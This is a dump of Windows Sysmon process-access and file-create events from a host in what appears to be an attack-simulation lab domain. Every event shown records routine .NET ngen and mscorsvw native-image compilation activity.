13:49:07.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D3-6005-2F03-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:07.059{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91D3-6005-2F03-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:07.059{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D3-6005-2F03-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:06.996{59A5CD1D-91D2-6005-2E03-00000000A301}4992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1380-0\System.Xml.Linq.dll2021-01-18 13:49:06.996 10341000x80000000000000007483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:08.449{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D4-6005-3403-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.434{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D4-6005-3403-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:08.434{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D4-6005-3403-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:08.293{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D4-6005-3303-00000000A301}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.277{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91D4-6005-3303-00000000A301}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:08.277{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D4-6005-3303-00000000A301}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:08.215{59A5CD1D-91D4-6005-3203-00000000A301}4400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1130-0\System.Runtime.WindowsRuntime.UI.Xaml.dll2021-01-18 13:49:08.215 10341000x80000000000000007476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:08.152{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D4-6005-3203-00000000A301}4400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.137{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D4-6005-3203-00000000A301}4400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:08.137{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D4-6005-3203-00000000A301}4400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:08.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D4-6005-3103-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.090{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D4-6005-3103-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:08.090{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D4-6005-3103-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:08.012{59A5CD1D-91D3-6005-3003-00000000A301}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4b0-0\System.Runtime.WindowsRuntime.dll2021-01-18 13:49:08.012 11241100x80000000000000007484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:49:09.934{59A5CD1D-91D4-6005-3403-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1324-0\System.Runtime.Serialization.dll2021-01-18 13:49:09.934 10341000x80000000000000007487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:10.059{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D6-6005-3503-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:10.043{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D6-6005-3503-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:10.043{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D6-6005-3503-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:11.059{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D7-6005-3603-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:11.043{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91D7-6005-3603-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:11.043{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D7-6005-3603-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000007491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:21.543{59A5CD1D-91D7-6005-3603-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1208-0\System.ServiceModel.dll2021-01-18 13:49:21.543 10341000x80000000000000007497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:22.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91E2-6005-3803-00000000A301}4804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 